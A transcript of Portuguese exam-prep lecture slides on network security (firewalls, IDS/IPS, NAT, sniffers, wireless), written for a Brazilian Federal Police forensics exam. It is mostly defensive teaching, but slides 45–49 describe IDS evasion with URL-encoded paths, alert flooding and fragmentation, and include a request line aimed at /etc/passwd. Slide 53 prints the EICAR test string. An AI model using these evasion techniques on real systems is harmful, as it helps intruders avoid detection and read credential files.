pf perito criminal
TRANSCRIPT
![Page 1: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/1.jpg)
Curso MultiplusPreparatório para prova da
Polícia Federal
Segurança em redes de Computadores
Prof. Marcelo Ribeiromribeirobr (at) globo (dot) com
www.mribeirobr.com
![Page 2: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/2.jpg)
SumárioAbordaremos os seguintes tópicos do Edital
8 - Segurança de redes de computadores
8.1 Firewall, sistemas de deteção de intrusão(IDS), antivírus, NAT, VPN
8.2 Monitoramento e análise de tráfego; Uso de Sniffers; Traffic Shaping
8.3 Tráfego de serviços e programas usados na internet
8.4 Segurança de redes sem fio: EAP, WEP, WPA, WPA2
8.5 Ataques em redes de computadores
![Page 3: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/3.jpg)
Metodologia
Apresentaremos conceitos e alguns exemplos práticos
Tambem serão apresentadas questões de provas anteriores e questões de provas de certificações de Ethical hacking
![Page 4: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/4.jpg)
Segurança em redes - Conceitos
Princípios Básicos
Confidencialidade: Certeza que somente as pessoas autorizadas a acessar os dados podem acessá-los
Integridade: Certeza que os dados não foram alterados - por acidente ou intencionalmente
Disponibilidade: Certeza que os dados estão acessíveis quando e onde forem necessários
Irretratabilidade: Impossibilidade em negar ser origem de uma informação
![Page 5: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/5.jpg)
Segurança - Conceitos Básicos! Elementos Utilizados para Garantir a Confidencialidade
! Criptografia dos dados ! Controle de acesso
! Elementos para garantir a Integridade
! Assinatura digital ! MD5- hash
! Elementos para garantir a Disponibilidade
! Backup ! Tolerância a falhas ! Redundância
! Elementos para garantir a Irretratabilidade ! Assinatura digital
![Page 6: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/6.jpg)
Segurança em redesPerímetro
! Fronteira fortificada da sua rede de dados ! Deve incluir alguns elementos de proteção
![Page 7: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/7.jpg)
Elementos de um Perímetro! Firewall ! VPN ! Zona Desmilitarizada (DMZ) ! Host Hardening ! Intrusion Detection System (IDS) ! Intrusion Prevention System (IPS) ! Network Address Translation (NAT) ! Analisadores de Conteúdo ! Analisadores de Logs ! Security Information and Event Management (SIEM)
![Page 8: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/8.jpg)
Elementos de um perímetro
Dispositivo (hardware + software) que possui regras específicas que permitem ou bloqueiam o tráfico
Barreiras de segurança entre a intranet e a Internet para proteger a rede interna contra acessos não autorizados
Mensagens que entram ou saem da rede devem ser examinadas pelo firewall, que toma ações de acordo com critérios de segurança especificados
![Page 9: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/9.jpg)
Elementos de um perímetro
Tipos:
Estático: Filtro de pacotes
Stateful: memoriza as conexões para uma melhor análise
Proxy de Aplicação
![Page 10: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/10.jpg)
Elementos de um perímetroFirewall tipo filtro de pacotes
Servidor Web
HTTP
Outros Protocolos
Cliente
![Page 11: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/11.jpg)
Elementos de um perímetroFirewall tipo filtro de pacotes
LAN
LAN
LAN
Internet
Firewall
Endereço/Serviço Autorizado
Endereço/Serviço não Autorizado
![Page 12: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/12.jpg)
Elementos de um perímetro
Exemplo de regra de firewall filtro de pacotes
access-list 102 permit tcp 192.168.100.200 0.0.0.0 eq 25
Essa regra, de número 102, permite o IP 192.168.100.200 sair para qualquer endereço (0.0.0.0) na porta 25/TCP (SMTP).
![Page 13: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/13.jpg)
Elementos de um perímetro
Filtro de pacotes - Vantagens
Fácil de implementar
Praticamente qualquer ativo de rede permite a criação de um
Filtro de pacote - Desvantagens
Facilmente burlável através de técnicas de IP Spoofing
Atua apenas na camada 3 do modelo OSI
![Page 14: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/14.jpg)
Elementos de um perímetroO ataque de IP Spoofing consiste em enganar o Firewall, mudando a origem do pacote, para uma origem conhecida pelo Firewall e autorizada por ele.
Normalmente usa-se os ednereços da rede interna (os quais, normalmente, são confiáveis para o Firewall)
O Anti-Spoofing é um conjunto de regras que impede que pacotes com endereço das redes internas venham de interfaces externas.
![Page 15: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/15.jpg)
Elementos de um perímetroProxy de aplicação
O que é? ! Procurador ! Atua no nível da aplicação- orientado a aplicação ! Geralmente, o cliente precisa ser modificado- não é transparente ! Funciona como acelerador - cache
Proxy Cache
Web Server
![Page 16: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/16.jpg)
Elementos de um perímetroProxy de Aplicação
Por que usar? ! Autenticação de usuário ! Inspeção de Conteúdo ! Cache ! Registro de Acessos ! Esconde detalhes da rede interna
Proxy Cache
Web Server
![Page 17: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/17.jpg)
Elementos de um perímetroProxy de aplicação
Proxy Web Server
1
3
6
2
5
4
Verifica …
User autorizado?
Protocolo permitido?
Destino autorizado?
![Page 18: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/18.jpg)
Elementos de um perímetroProxy de aplicação
Internet
LAN2 Matriz
LAN1
1
3 5
6
2 4
![Page 19: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/19.jpg)
Elementos de um perímetroProxy reverso
3
Web Server
DNS Server
Proxy R
5
4
2
6
1
Verifica …
Request é permitido?
Protocolo permitido?
Destino permitido?
![Page 20: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/20.jpg)
Elementos de um perímetroFirewall Statefull Inspection
Tambem conhecido como Filtro de pacotes dinâmico
Consegue atuar nas 7 camadas do modelo OSI pois consegue reconhecer cada protocolo (não apenas abre as portas, mas entende o protocolo em si), podendo interpretar um ataque sobre o protocolo.
![Page 21: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/21.jpg)
Elementos de um perímetroFirewall Statefull inspection
Vantagens
O mais seguro atualmente por conseguir reconhecer ataques semânticos
Desvantagens
Mais complexo de implementar e administrar
Necessita estar sempre atualizado para manter seu nível de segurança.
![Page 22: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/22.jpg)
Elementos de um perímetro
VPN - Virtual Private Network
Esta técnica consiste em encapsular um pacote, não cifrado, em um outro que está cifrado por uma chave de sessão.
O outro parceiro da comunicação será capaz em remover o pacote original do encapsulamento e estabelecer a comunicação com o pacote restaurado.
![Page 23: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/23.jpg)
Elementos de um perímetro
Internet
Usuário remoto
ISDN Cable DSL Site central
Server
Site Remoto
Site Remoto
![Page 24: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/24.jpg)
Elementos de um perímetroClassificação de VPN
Por tipo
Remote access
Site-to-Site
Por tecnologia
IPSEC
SSL
![Page 25: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/25.jpg)
Elementos de um perímetro
DMZ - Demilitarized Zone
Rede separada, na qual são hospedados servidores ou serviços a serem disponibilizados externamente.
Objetiva separar os serviços externos da rede interna da empresa ou mesmo separar serviços mais críticos/vulneráveis de redes mais sensíveis.
![Page 26: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/26.jpg)
Elementos de um perímetro
Internet
Servidor Web
Firewall
Cliente
Intranet
![Page 27: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/27.jpg)
Elementos de um perímetro
Router B
Parceiro1 Parceiro2 Parceiro3
Internet
INTRANET
LAN1
LAN2
LAN3
LAN4
LAN5
FILIAL
VPN
DMZ
WEB Server
DNS Server
Mail Server
Proxy R.
Hardened Server
Firewall Firewall/ Proxy
![Page 28: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/28.jpg)
Elementos de um perímetroSistemas de deteção de intrusão (IDS - Intrusion Detection System)
Utilizado para detectar e alertar eventos maliciosos
Antecipar possíveis invasões aos sistemas
O sistema de defesa deverá dispor de vários agentes IDS pela rede
Normalmente verifica assinaturas pré-definidas e eventos maliciosos
Podem ser de rede (NIDS) ou de host (HIDS)
![Page 29: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/29.jpg)
Elementos de um perímetro
![Page 30: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/30.jpg)
Elementos de um Perímetro
HIDS
Esse tipo de IDS reside em um único “host” e monitora atividades específicas do mesmo
Pode ser baseado em assinaturas
Verifica a integridade dos arquivos do SO
Monitora utilização de recursos do host
![Page 31: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/31.jpg)
Elementos de um perímetroHIDS - O que ele monitora?
! Exemplos de componentes monitorados
! Memória ! Arquivos executáveis ! Espaço em disco
! Kernel
![Page 32: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/32.jpg)
Elementos de um perímetroNIDS
Monitora todo o tráfego da rede e compara este a um banco de dados com assinaturas de ataque
Quando uma assinatura é detectada um evento é disparado pelo IDS
Sistema utilizado para detectar e/ou reagir a uma assinatura de ataque na rede
Utilizado para analisar o tráfego de rede em tempo real
Equipamento dedicado com processamento compatível com o tamanho da infra-estrutura
![Page 33: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/33.jpg)
Elementos de um perímetroNIDS
! Sensor de Rede ! Posicionamento em função do conhecimento da topologia
! Em ambientes com switch - Espelhamento de porta ! Configuração stealth recomendada - Interface de captura sem endereçamento e capturando tráfego de rede em modo promíscuo
![Page 34: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/34.jpg)
Elementos de um perímetroSistema de prevenção de intrusão - IPS (Intrusion Prevention System)
Funciona de forma análoga ao IDS, mas além de alertar sobre os ataques ele é capaz em bloquear os mesmos, através de interações com outros dispositivos na rede (Firewalls, roteadores, switches, dentre outros)
Pode ser usado em modo “Learning”, no qual atuará como um IDS
![Page 35: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/35.jpg)
Elementos de um perímetroPrincipais problemas dos IPS/IDS
Dependem fortemente das assinaturas de ataques estarem atualizadas (semelhante aos anti-vírus)
Se houver um ataque dentro de uma VPN ou contra um servidor WEB com SSL habilitado ele será incapaz em detectar o ataque, face a criptografia *
Complexos de implementar
* A menos que seja um IPS recente, no qual é possível instalar as chaves de sessão de criptografia no mesmo, possibilitando a leitura do trafego anteriormente cifrado e sua análise.
![Page 36: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/36.jpg)
Elemento de um perímetroTerminologia comum com IDS/IPS
Falso Positivo - A detecão de uma atividade normal, mas interpretada como uma atividade maliciosa. Ocorre normalmente pela configuração não ajustada do dispositivo de detecção. Pode ser atribuida a uma configuração “segura” demais ou ao comportamento pouco convencional de alguns protocolos
Falso Negativo - A interpretação de um evento malicioso como sendo uma atividade normal, não gerando nenhum tipo de aviso ao administrador do sistema. Normalmente ocorre com um dispositivo configurado para ser permissivo (por falha de configuração ou para permitir determinada aplicação funcionar)
![Page 37: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/37.jpg)
Elementos de um perímetroFuncionamento de um IDS
Tecnologia complementar ao firewall
Realiza inspeção profunda em pacotes de rede (DPI)
Tecnologia Reativa – detection (ataque pode ser simples pacote)
![Page 38: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/38.jpg)
Elementos de um perímetroO que IDS procuram?
Tentativa de Intrusão
Denial of Service
Atividade Suspeita
Anomalia em Protocolos
Anomalia Estatistica
![Page 39: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/39.jpg)
Elementos de um perímetroModelos
Baseado em assinaturas
Baseado em detecção de anomalias
Estratégias de monitoramento
Tipos
Network Based
Host Based
![Page 40: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/40.jpg)
Elementos de um perímetroIDS baseado em assinaturas - funcionamento
Análise por Pacote - procura assinaturas de ataque individualmente, em cada pacote. Não detecta ACK scans lentos. Não consegue verificar a relação entre pacotes associados. Ex. Shadow, RealSecure.
Statefull - Adiciona a capacidade de procurar por assinaturas na sessão. Entende fragmentação de pacotes e Identifica ataques em múltiplos pacotes, pois verifica o estado das comunicações e a remontagem dos pacotes. Ex. Loki (icmp e UDP53) – “Covert comunication Channel”. Ex. Network Flight Recorder, DragonIDS. Snort e CSIDS (estáticos com caract. Statefull).
Protocol Decode-Based - verificação é feita no nível da aplicação. Ex. HTTP e SMTP. Utilizados para prevencão de ataques a aplicações específicas.
Heuristic Analysis-Based - processo de analisar o tráfego de forma estatística.
Caracteriza o tráfego.
Quantas portas estão sendo abertas por um único host, por minuto? Quantos sistemas estão conectados a um único host? Quantas conexões por segundo estão sendo utlizadas?
Método utilizado para detectar port scan.
![Page 41: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/41.jpg)
Elementos de um perímetroIDS baseados em assinaturas: Vantagens e desvantagens
Vantagens
Baixa rate de alarmes falsos, comparado com outros tipos de IDS.
Regras padronizadas e de fácil entendimento. As regras do IDS snort são simples e de fácil entendimento. Podem ser editadas e até mesmo criadas a partir do conhecimento do modus operandi de um exploit.
Desvantagens
Uso intenso de recursos pois pode verificar os pacotes nas camadas mais altas. O custo da abertura integral dos pacotes da rede pode ser bastante intenso, em termos de processamento e uso de memória.
A base de dados de assinaturas de ataques necessita de manutenção e updates contínuos, tendo em vista que novos ataques surgem a cada dia. Caso as atualizações não sejam efetuadas o sensor não irá alertar para um novo ataque. Esses ataques não serão detectados até que suas assinaturas sejam atualizadas ou criadas manualmente no IDS.
![Page 42: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/42.jpg)
Elementos de um perímetroIDS baseado em anomalia
Aprende a rede
Fronteira entre normal e anormal é tenue
![Page 43: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/43.jpg)
Elementos de um perímetroIDS baseado em anomalia
Vantagens
Dinamicamente adaptável a novos ataques, pois aprende a conhecer o comportamento da rede e alerta para qualquer nova atividade.
Simples de se implementar. Não há muito o que configurar, bastando colocá-lo para aprender e depois torná-lo funcional.
Desvantagens
Alta rate de alarmes falsos. Nem tudo é aprendido pelo IDS. Novas situações ocorrem a cada momento.
Atividade dos usuários e comportamento do sistema pode não ser estático o suficiente para ser implementado de forma efetiva. Configurações em uma rede local mudam o tempo todo.
![Page 44: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/44.jpg)
Elementos de um perímetroEstratégias de monitoramento
Host - Fonte de dados: interna ao sistema. Geralmente logs do sistema (Ex.Windows event logs e Linux Syslog.
Restrito a eventos do sistema operacional. Pode monitorar system calls, memória, processos etc. Ex. Cisco Security Agent.
Monitoramento de Rede - Fonte de dados: pacotes de rede. Dispositivos de rede em modo promíscuo. Esse tipo pode ser afetado pela arquitetura da rede. Ex. redes com switches necessitam de algumas adaptações. Além disso, não é restrito a tráfego destinado a um único host Ex. Cisco IDS, Snort, Shadow.
Monitoramento de Aplicacao - Fonte de dados: aplicação em uso: logs de eventos da aplicação. Possiveis aplicações: Web servers - IIS, Apache etc. Mail servers – Sendmail, Exchange etc. Ex. Cisco Security Agent e ISS RealSecure – analisa logs, verifica assinaturas e entende aplicações Web –IIS e Apache.
Monitoramento de alvo - focado em um sistema. Monitora o estado de um objeto e utiliza criptografia – funções de hash. Detecta alterações no sistema, mas não envia alertas em tempo real. Ex. Alterações nos arquivos cmd.exe, /sbin/ps, ls etc. Ex. Tripwire e Advance Intrusion Detection Engine (AIDE).
![Page 45: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/45.jpg)
Elementos de um perímetroIDS/IPS - Técnicas de evasão
Method Matching
URL Encoding
Duble Slashes
Self-Reference Directories
Flooding de alertas
Fragmentação
![Page 46: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/46.jpg)
Elementos de um perímetroMethod Matching
Substituição
GET /cgi-bin/example.cgi HTTP/1.0
por
HEAD /cgi-bin/example.cgi HTTP/1.0
URL Encoding
http permite URL utilizando notação %xx, onde xx é o valor hex do caracter
cgi-bin = %63%67%69%2d%62%69%6e
get /%63%67%69%2d%62%69%6e/exemple.cgi HTTP/1.0
Double Slashes
Substitui / por //
Self-Reference Directories
Adiciona /./ na URL para confundir o sensor
![Page 47: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/47.jpg)
Elementos de um perímetroTécnicas de evasão (cont.)
Flooding de alertas
Atacante utiliza ferramentas para confundir o sensor inundando o mesmo com pacotes que simulam assinaturas de ataque.
Sensor perde pacotes (flooding) ou o ADM fica confuso com tantos alertas (o ataque não é visualizado).
Ferramentas:
Stick e Snot - “IDS Killers”, baseados nas assinaturas do snort.
Nmap –D “decoy”.
![Page 48: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/48.jpg)
Elementos de um perímetroTécnicas de evasão (cont.)
Fragmentação
Utilizada em todas as fases do ataque
Remontagem no destino confunde o sensor
Tipos de fragmentação
get …./etc/passwd
![Page 49: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/49.jpg)
Elementos de um perímetroFragmentação (cont.)
Diferentes S.O remontam fragmentos de forma diferente. Não existe padronização para a remontagem.
O sensor, não necessariamente sabe o método de remontagem que será utilizado (fica confuso).
Snort com frag2 sempre remonta como Linux.
Snort com frag3 tem múltiplos buffers de remontagem.
CSIDS tem setagem para escolher manualmente – só pode remontar de uma forma e com isso só identifica ataques fragmentados em um único Sistema Operacional.
Ferramentas de attaque para fragmentação
Nmap – tiny fragment attack.
Fragrouter.
FragRoute.
![Page 50: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/50.jpg)
Elementos de um perímetroNAT - Network Address Translation
Técnica utilizada por um dispositivo para a tradução de endereços IP
Permite que uma rede use um conjunto de endereços IP particulares para tráfego interno
Converte os endereços IP particulares em endereços IP públicos
Aumenta a segurança ocultando endereços IP Internos
Permite que uma organização economize endereços IP públicos
Pode ser classificado em:
Estático (ou 1 para 1) - Onde um endereço público é traduzido para um interno
Dinâmico (ou 1 para muitos) - Onde um endereço público pode ser traduzido para vários internos. O controle disso se dá através de uma tabela, no dispositivo que controla o NAT, associando cada conexão a um Source Port)
![Page 51: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/51.jpg)
Elementos de um perímetro
131.107.0.9 131.107.0.9
10.10.10.7 Tabela NAT ! 10.10.10.0 mapeia
para 131.107.0.9
10.10.10.6
10.10.10.10
![Page 52: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/52.jpg)
Elementos de um perímetroAnti-vírus
Software, comumente instalado nos hosts da rede, que tem como função buscar uma ameaça (malware) em um arquivo no computador.
Esta análise se dá através de comparação com um banco de assinaturas de malwares disponibilizada pelo fabricante
Pode usar uma análise herústica, que possibilita a detecção de malwares não conhecidos pelo fabricante, assim como também pode gerar grande número de falsos positivos.
![Page 53: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/53.jpg)
Elementos de um perímetro
Anti-vírus (cont.)
O que acontece se criarmos um arquivo texto em um computador com anti-vírus e digitamos as linhas abaixo?
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
![Page 54: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/54.jpg)
Monitoramento e análise de tráfego
A tarefa de análise de tráfego de rede é executada, comumente, com o uso de uma ferramenta chamada Sniffer.
Esta ferramenta funciona lendo o tráfego de rede que chega até a interface de rede do computador utilizado para a análise
Em face do Sniffer apenas poder análisar o tráfego que passa pela sua interface de rede faz-se necessário que TODO o tráfego da rede chege a interface. Conseguimos isso colocando a interface de rede no chamado “modo promíscuo”
![Page 55: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/55.jpg)
Monitoramento e análise de tráfego
Modo promíscuo
Faz com que a placa da rede responda a todos os pacotes que circulam pela rede, independente se estes foram destinados aquela interface ou não
Consegue-se esse efeito respondendo a todos os pacotes de broadcast que circulam na rede, dando a impressão que todos os pacotes são para aquele host.
![Page 56: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/56.jpg)
Monitoramento e análise de tráfego
Sniffer
Contudo os pacotes ainda precisam ser acessíveis pela porta
Em uma rede com “Hubs” isso faz parte do modo de funcionamento normal da rede, pois TODAS AS PORTAS RECEBEM TODOS OS PACOTES (também chamado de “Passive Sniffing”)
Em uma rede com switches isso não acontece, pois O SWITCH REDIRECIONA O PACOTE PARA A PORTA CORRETA, EM CONFORMIDADE COM O SRC ADDRESS DO PACOTE
Como usar Sniffers em redes com switches?
![Page 57: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/57.jpg)
Monitoramento e análise de tráfego
Sniffer (cont.)
Switch Monitor port (Ou SPAN port)
Porta especial, configurável em um switch gerenciável, que recebe uma cópia de cada pacote que circula naquele switch, independente de ser a porta correta para aquele pacote
Serve apenas para monitoramento de rede.
Também chamado de “Active Sniffing”
Em equipamentos da Cisco a porta de monitoramento chama-se SPAN (Switched Port Analyser)
Vale salientar que esta dificuldade sobre a porta vale também para dispositivos como IDS e IPS pois, em essência, funcionam de forma análoga a um Sniffer.
![Page 58: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/58.jpg)
Monitoramento e análise de tráfego
Protocolos interessantes para se monitorar com um sniffer
Telnet e RLOGIN - Transmitem usuário e senha em claro na rede
HTTP - Todo o tráfego segue em claro
SMTP, NNTP, POP, FTP, IMAP - Senhas e dados seguem em claro
![Page 59: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/59.jpg)
Monitoramento e análise de tráfego
Ferramenta: Wireshark
Popular sniffer, open source, sendo praticamente ferramenta padrão deste tipo.
![Page 60: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/60.jpg)
Monitoramento e análise de tráfego
![Page 61: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/61.jpg)
Monitoramento e análise de tráfego
O que um sniffer não pode ver em uma rede?
Tráfego criptografado
Tráfego que não passe pela sua interface (a menos que seja feito um ataque para desviar a rota)
![Page 62: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/62.jpg)
Monitoramento e análise de tráfego
TCP Dump
Ferramenta para debugging de rede, na qual diversas outras são baseadas (o IDS Snort, por exemplo)
Usa a biblioteca Libpcap, também usada pelo Wireshark
Não é tão amigável quanto o Wireshark, mas é mais prático em algumas situações
![Page 63: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/63.jpg)
Monitoramento e análise de tráfego
TCP Dump
![Page 64: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/64.jpg)
Monitoramento e análise de tráfego
Exemplos práticos com o Wireshark
![Page 65: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/65.jpg)
Monitoramento e análise de tráfego
Traffic Shapping
Técnica que prioriza tráfego, de acordo com algumas políticas e regras, para otimizar o uso de largura de banda disponível no link
Muito utilizado como técnica de QoS (quality of service)
Pode priorizar usando as seguintes políticas
Por tipo de serviço
Por rede
Por peso de protocolo e conexão (WRR - Weighted round robin)
Muito utilizado em provedores de internet para controle de protocolos que reconhecidamente cogestionam uma rede (P2P por exemplo)
![Page 66: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/66.jpg)
Segurança em redes sem fio
Redes sem fio (Wireless) estão cada vez mais presentes em nosso dia a dia, mas face a simplicidade em se colocar uma delas em funcionamento comumente estão inseguras.
É muito comum encontrar redes sem fio, sem senha, até mesmo no centro do RJ
![Page 67: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/67.jpg)
Segurança em redes sem fio
![Page 68: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/68.jpg)
Segurança em redes sem fio
![Page 69: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/69.jpg)
Segurança em redes sem fioPadrões
Banda de até 54 Mbps e atua na faixa de frequencia de 5 Ghz!
Banda de até 11 Mbps e atua na faixa de frequencia de 2,4 Ghz!
Banda de até 54 Mbps e atua na faixa de frequencia de 2,4 Ghz!
Um padrão para WLAN que prove melhor criptografia para redes 802.11a,b e g!
Novo padrão 802.11 que suporta banda de 100Mbps +!
Grupo de padrões para Wireless MAN (Metropolitan Area Networks)!
Suporta transferencias a baixa velocidade (1-3 mbps) e baixo alcance (˜10 metros), desenvolvido para dispositivos móveis!
![Page 70: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/70.jpg)
Segurança em redes sem fioService Set Identifier (SSID)
É um token para idenficar uma rede 802.11.
É parte do cabeçalho dos pacotes 802.11
Funciona como um identificador único compartilhado entre o AP e os clientes
Se alterado no AP precisa ser mudado em TODOS os clientes
Clientes podem se conectar a um SSID “none” ou “any”, que é uma configuração não segura.
![Page 71: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/71.jpg)
Segurança em redes sem fioModo de autenticação Open Authentication Process
![Page 72: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/72.jpg)
Segurança em redes sem fioModo de autenticação com Shared Key
